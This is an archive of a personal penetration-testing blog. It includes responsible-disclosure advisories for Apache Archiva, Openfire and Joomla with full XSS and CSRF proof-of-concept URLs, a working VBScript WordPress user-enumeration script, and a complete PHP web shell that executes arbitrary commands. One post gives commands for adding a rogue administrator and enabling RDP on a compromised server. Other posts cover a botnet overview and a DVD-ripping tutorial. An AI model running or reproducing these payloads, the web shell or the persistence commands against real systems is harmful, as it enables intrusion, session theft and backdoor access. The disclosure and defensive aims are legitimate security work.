A Programmer's Rhapsody

C0C0N 2011 - CTF Walkthrough

2011-10-16T11:30:00.001-07:00

I won the recently concluded C0C0N Capture the Flag event at the conference. Here's the walkthrough for all the levels on slideshare.

C0c0n 2011 CTF Walkthrough

View more documents from riyazwalikar

Enable RDP via Command line

2011-08-17T18:16:00.000-07:00

Been extremely busy with loads of work. Anyways, here's something interesting that I needed to do recently at a customer network to gain access to a server.

I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The Application was running of XAMPP under an administrative accounts, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here's what I did:

1. Created a user and added it to the local administrators group using these commands:

net user newadmin newpa$$w0rd /add

net localgroup administrators newadmin /add

net user newadmin

2. Used the following commands to enable Remote Desktop and logged in with my credentials:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

/v fDenyTSConnections /t REG_DWORD /d 0 /f



netsh firewall set portopening TCP 3389

3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.

Lot of Penetration Testers, reach this wall at some point during their assessments. Hope this helps some tired soul like me.

Happy Hacking!

Apache Archiva Multiple XSS & CSRF Vulnerabilities

2011-05-30T04:10:00.000-07:00

I am honestly surprised at the frequency and places one would find threats like Cross Site Scripting and Cross Site Request Forgery. Although immensely easy to locate and exploit, it can get quite twisted to fix these issues in large applications. Here's a rundown on another product that was found vulnerable. As part of the vulnerability research that I do with published web applications, I downloaded a copy of Apache's Archiva 1.3.4 which was the latest published edition on the vendor's website. Upon examination, there seemed to be several issues with the application that I reported responsibly to the vendor and co-operated in responsible disclosure. Since the cat is now out of the bag, here's the condensed disclosure document with the exploit code intact.

Title: Multiple XSS & CSRF Vulnerabilities in Apache Archiva 1.3.4
--------------------------------------------------------------------

Project: Apache Archiva
Severity: High
Versions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2 are also affected.
Exploit type: Multiple XSS & CSRF
Mitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5
Vendor URL: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1077, CVE-2011-1026
--------------------------------------------------------------------

Timeline:
28 February 2011: Vendor Contacted
1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues Assigned.
7 March 2011: CVE-2011-1077 Assigned for XSS Issues.
14 March 2011: Fixes released to selected channels / Found to be insufficient
27 May 2011: Vendor releases v1.3.5
27 May 2011: Vendor releases security disclosure to Bugtraq and FD.
30 May 2011: Exploit details released on Bugtraq & FD
--------------------------------------------------------------------

Product Description:
Apache Archiva is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT.

Archiva offers several capabilities, amongst which remote repository proxying, security access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning functionality... and many more!
(Source: http://archiva.apache.org/)
--------------------------------------------------------------------

Vulnerability Details:
XSS: User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

CSRF: These issues allow an attacker to access and use the application with the session of a logged on user. In this case if an administrative account is exploited, total application compromise may be acheived.
An attacker can build a simple html page containing a hidden Image tag (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator to access the page.
----------------------------------------------------------------------

Proof of Concept:
Reflected XSS:
http://127.0.0.1:8080/archiva/security/useredit.action?username=test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22><script>alert('xss')</script>
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1<script>alert('xss')</script>&artifactId=1<script>alert('xss')</script>&version=1&repositoryId=internal
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test<script>alert('xss')</script>&groupId=test<script>alert('xss')</script>&artifactId=test<script>alert('xss')</script>&version=test<script>alert('xss')</script>&classifier=test<script>alert('xss')</script>&type=test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test<script>alert('xss')</script>

Persistant (Stored) XSS:
Exploit code: test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/admin/addRepository.action (Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=

http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)
http://127.0.0.1:8080/archiva/admin/configureAppearance.action

http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId, Version:version, Classifier:classifier, Type:type)
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action

http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action (Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)
http://127.0.0.1:8080/archiva/admin/networkProxies.action

CSRF:
http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abc
http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test
http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit
http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots
http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp
http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm
http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal
http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots
http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen/jars/jaxen-1.0-FCS-full.jar
http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy
http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**/*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**/*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsumers=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums
http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project
http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed
---------------------------------------------------------------------

Please update to Archiva 1.3.5, available for download via the vendor's website.

WordPress UserId & Username Enumeration Exploit/PoC Script

2011-05-29T07:23:00.000-07:00

On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by recursively supplying a author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493

Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.

'Author: karniv0re@null.co.in
'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
'This script allows an attacker to enumerate wordpress users by
'querying the value of the parameter 'author' using xmlHTTP.

Dim url, sQuery, args, i, max

if wscript.arguments.count < 1 then
wscript.echo "WPEnum - WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo "Insufficient Parameters."
wscript.echo
wscript.echo "cscript WPEnum.vbs <url> [<max_users>]"
wscript.echo "<url>: A WordPress based website in the form of http://site/"
wscript.echo "<max_users>:[Optional] Maximum number of users. Default 20."
wscript.echo "Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10"
wscript.echo
wscript.quit
End if

set args = wscript.Arguments

wscript.echo "WPEnum - WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo
wscript.echo "Enumerating ..."
wscript.echo

i=0
max=20
url = args(0)
if right(url,1)<> "/" then
url = url & "/"
End if

if wscript.arguments.count = 2 AND IsNumeric(args(1)) then
max=args(1)
End if

Set xmlHTTP = Nothing
set xmlHTTP = CreateObject("Microsoft.XmlHttp")

For i=1 to max
sQuery = args(0) & "?author=" & i
xmlHTTP.open "GET", sQuery, false
xmlHTTP.send ""

wscript.sleep 70

do while not xmlHTTP.readyState=4
Loop

if xmlHTTP.status = 404 then
wscript.echo
i=i-1
wscript.echo i & " users enumerated."
wscript.echo "Done!"
Set xmlHTTP = Nothing
wscript. quit
End if

wscript.echo "Userid:" & i

k = Instr(Lcase(xmlHTTP.responseText),"<title>")
j = Instr(Lcase(xmlHTTP.responseText),"</title>")
username = Mid(xmlHTTP.responseText, k+7, j-k-7)
wscript.echo username
wscript.echo
Next

wscript.echo i & " users enumerated."
wscript.echo "Done!"

Set xmlHTTP = Nothing

'End of program

Simple PHP Web Application Backdoor

2011-03-19T16:35:00.000-07:00

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application's home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here's the code:


<html>
<head>
<title>
simple php shell PoC - karniv0re
</title>
</head>
<body>
<h2>System Info</h2>
<pre>
<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";
?>
</pre>
<br />
<form method="post">
<input type="text" name="cmd">
<input type="submit" value="Execute!">
<br />
<h2>Command Output</h2>
<pre>
<?php
if(isset($_POST['cmd'])){
 $cmd = $_POST['cmd'];
 if (strlen($cmd)==0){
 $cmd = "true";
 }
 system($cmd);
 die;
}
?>
</pre>
</body>
</html>

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!

Multiple XSS and XSRF issues in Openfire 3.6.4

2011-02-15T23:56:00.000-08:00

I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
http://www.securityfocus.com/bid/45682
http://secunia.com/advisories/42799
http://packetstormsecurity.org/files/author/8144/
http://www.exploit-db.com/exploits/15918/

The following is the condensed disclosure document for the vulnerabilities.:
Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
--------------------------------------------------------------------

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS and CSRF
Fixes Available: None
--------------------------------------------------------------------

Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update recevied. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 January 2011
05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
--------------------------------------------------------------------

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
--------------------------------------------------------------------

Affected Files/Locations/Modules:
XSS:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

CSRF:
user-create.jsp
user-password.jsp
user-delete.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp

---------------------------------------------------------------------

Vulnerability Details:
User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

Since the vulnerabilities exisit in the administrative module, a sucessful attack could cause a complete compromise of the entire application.

An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
----------------------------------------------------------------------

Proof of Concept:
Persistent XSS:
http://target-url/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

http://target-url/user-create.jsp?username=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?name=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?email=test"><script>alert('xss')</script>

http://target-url/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

http://target-url/user-roster-add.jsp?username=test<script>alert('xss')</script>
http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

http://target-url/user-roster.jsp?username=test<script>alert(document.cookie)</script>
http://target-url/user-lockout.jsp?username=test<script>alert('xss')</script>

http://target-url/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

http://target-url/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

http://target-url/group-delete.jsp?group=<script>alert('xss')</script>

http://target-url/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

http://target-url/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions

Stored XSS:
http://target-url/group-create.jsp
http://target-url/group-summary.jsp
Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
Group Name: Test<script>alert("xss")</script>
Description: Test<script>alert("xss")</script>
Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.

CSRF:
For the following links, create html pages with image tags with scr= the following links and ask the user to view these pages. If a user is logged into Openfire's admin console and the HTML pages are viewed then the respective functions are called:
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User>
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password>
http://target-url/user-delete.jsp?username=tester&delete=Delete+User
http://target-url/user-delete.jsp?username=tester&delete=Delete+User>
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group>
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add>
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update>

---------------------------------------------------------------------

Multiple Joomla! XSS Vulnerabilities - CVE-2010-1649

2010-06-11T02:56:00.000-07:00

Last month, while doing some tests on a Joomla! installation on my home computer, I came across a very glaring security issue. The Joomla! admin module has several components that are used to manage the site and its users. Several of these components have a search text box that allows users to search through the list of entities displayed. For example the search box in com_users component allows searching the list of users displayed. The issue was with the search boxes not sanitizing user input. That meant you could enter HTML text in the boxes and it would be rendered and displayed! That is exactly the cause of the world's most common web application vulnerability, Cross Site Scripting or more commonly known as XSS.

This should help beginners understand XSS.
http://en.wikipedia.org/wiki/Cross-site_scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigation implemented by the site's owner.

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Cross Site Scripting can be divided into 2 classes. Persistent and Non-Persistent. The following exploit examples should make things clearer:

Examples taken from Wikipedia.

Non-persistent:

1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.
4. Alice visits the URL provided by Mallory while logged into Bob's website.
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.

Persistent attack:

1. Mallory posts a message with malicious payload to a social network.
2. When Bob reads the message, Mallory's XSS steals Bob's cookie.
3. Mallory can now hijack Bob's session and impersonate Bob.

All versions of Joomla! prior to 1.5.18 are vulnerable to an XSS injection attack in the admin module. The following are the vulnerabaility details and exploit code.

* Project: Joomla!
* SubProject: All
* Severity: High
* Versions: 1.5.17 and all previous 1.5 releases
* Exploit type: XSS Injection
* Reported Date: 2010-May-13
* Fixed Date: 2010-May-28
* Fixed Version: Joomla! 1.5.18
* Update Download Link: http://www.joomla.org/download.html
* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html

Vulnerability Details:

User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability arises due to the administrator core components failing to properly sanitize user-supplied input in the "search"
variable. Successful exploitation of this vulnerability could result in, but not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

An attacker can send a link with the exploit to an administrator whose access could compromise the application. The following PoC is
available:

http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E

http://joomlasite/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

CONFIRM URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html
BID: 40444 - http://www.securityfocus.com/bid/40444
CVE-2010-1649: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1649
Secunia: 39964: http://secunia.com/advisories/39964
OSVDB: 65011: http://www.osvdb.org/65011

Please update your installation of Joomla! to the latest available stable release, which at the time of writing was 1.5.18.

The Kneber Botnet

2010-02-22T01:54:00.000-08:00

The term Botnet is used to refer to a collection of software robots or bots which are automated applications that infect multiple, possibly geographically disbursed, computers. These infected computers can then be controlled remotely via a central Control and Command Center (C&C) which the Botnet herder sets up. Botnets are used in underground criminal activities to steal credit card information, perform Distributed Denial of Service attacks, creation or misuse of SMTP mail relays for spam, click fraud, spamdexing and the theft of application serial numbers and login IDs of personal banking accounts and online mail accounts.

While the term "botnet" can be used to refer to any group of bots, such as IRC bots, this word is generally used to refer to a collection of compromised computers (called zombie computers) running software, usually installed via drive-by downloads exploiting web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure. This setup is remotely controlled by a Bot herder, also called as Bot master using a C&C via IRC channels or through Web Servers. When a botnet has become sufficiently large, criminals may try to acquire them for undisclosed but large sums of money to gain access to all the data and resulting information from the infected machines and subsequently from the networks associated with them.

The Kneber botnet, discovered by NetWitness, a company that deals with network monitoring and threat analysis solutions, is a new variant of the already massive ZeuS botnet, which has reportedly compromised 75000 machines in 2500 business worldwide. The Kneber botnet is based on the older 1.2 version of ZeuS which is given away for free. ZeuS, also known as Zbot, is readily available to buy in underground forums for as little as 700 USD. The package contains a builder that can generate a bot executable and Web server files (PHP, images, SQL templates) for use as the command and control server. While ZeuS is a generic back door that allows full control by an unauthorized remote user, the primary function of ZeuS is financial gain stealing online credentials such as FTP, email, online banking, and other online passwords via keystroke logging. Zeus' current botnet is estimated to include millions of compromised computers (around 3.6 million in the United States alone). Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, and BusinessWeek.

The Kneber botnet is a relatively small botnet considering the number of compromised computers, although the number of organization and business infected is quite high. The Kneber botnet uses rootkit technologies, undocumented Windows API and other stealth techniques to hide its presence on the infected machine. The Kneber botnet infects only Windows computers and has been known to infect Windows XP Professional SP 2 machines more than any other flavors. The explanation for this could be attributed to the nature in which machines are infected. Computers at the work place can be infected via accesses to sites that cause drive by downloads, URLs of which may be received via spam mails. Also vulnerabilities in the browser (IE 6 and IE 7) and security issues in the OS itself may trigger an infection. No reports of Windows 7 computers being infected have been seen yet possibly due to the use of IE 8 and patching of critical vulnerabilities found in older versions of Windows.

Symptoms of infection may include unexplained bandwidth usage, unknown processes being created, unexplained usage of CPU and memory resources and frequent stalling of applications. The ZeuS botnet is very difficult to detect even with up-to-date antivirus software. Ironically, there are other botnets that have installers made for ZeuS, like the Trojan SpyEye, so that when it affects a computer already infected with ZeuS, it can kick out Zeus and claim the machine for itself. Of course, the computer is still a bot, just with a different Control and Command Center and Bot Herder. The Kneber botnet on the other hand is easily detected and cleaned by most antivirus programs due to its usage of the older version of ZeuS. Egress filtering on traffic at the network perimeter between internal private networks and the Internet may help detect early infection and coupled with active intrusion detection systems may protect organizations and businesses alike. Using virtual keyboards, found on the login pages of most banking applications, or the Microsoft On-Screen Keyboard (osk.exe), when entering sensitive data on even trusted sites, will help protect user identities, financial information and data confidentiality. Common utilities like TCPView, Process Monitor and Process Explorer from Sysinternals (Microsoft) will help identify Network, CPU and Memory congestion factors. It is advisable that businesses continue to train its employees to prevent them from clicking links in emails or on the web, opening malicious attachments while also keeping up with antivirus and operating system updates. Securing the operating system goes in preventing several unrelated issues as well.

The 700MB DVDrip Tutorial

2009-11-20T01:26:00.000-08:00

I recently bought a copy of The Lost Symbol from Indiaplaza.in. Along with the book I got the DVD of DaVinci Code free. The site really does deliver what it promises.. Any ways coming back to the real premise of this blog post, I had not seen the movie version of The DaVinci Code and from the reviews and ratings at IMDB, I had no intentions of seeing it any sooner. Yet here I was holding a DVD of DaVinci Code in my hand. I decided to give my DVDripping skills a test. Not that you require any special skills to rip a DVD into that perfect 700 MB movie that you get on torrents. Its all there on the Internet, the tools and the tutorials.. What you will need is atleast 5 GB of free space and a bit of patience.

Note that piracy in any form is illegal, Im not sure about the scenario in India, although I would advise you to buy the DVD if you like the movie. This tutorial (or blog or article or whatever you want to call it) is strictly educational. Please try not to distribute the files generated at the end of the process.

Coming back to what this is all about. You will need two programs. One is a DVD Ripping program and the other is AutoGK. I personally use DVD Decrypter because of is ease of use. VirtualDubMod is a substitute program that can be used in place of AutoGK. In fact AutoGK uses VirtualDubMod to compress and create the 700 MB avi. We shall see more of them later. For now download these tools from the following links. The Internet is abundant with these tools and a simple Google search will provide you with numerous links:

1. DVD Decrypter: http://www.mrbass.org/dvdrip/SetupDVDDecrypter_3.5.4.0.exe
2. AutoGK: http://www.autogk.me.uk

The requirements before you begin:
A P4 2.0 GHz or faster Windows XP and higher computer (the more the Ghz the better)
Atleast 1 GB of RAM
Atleast 5GB free
A DVD Drive (like duh..)
DVD Decrypter
AutoGK
Lots of patience (because the entire process can take about 2-3 hours depending on the size of the movie and the chosen settings)

Install both the tools and insert the movie DVD into the DVD drive of your computer. It would be advisable to close all open programs since this process is memory and processor intensive.

Part I [Ripping the DVD to the hard drive]

Run the DVD Decrypter program from the Desktop or the Start menu > Programs

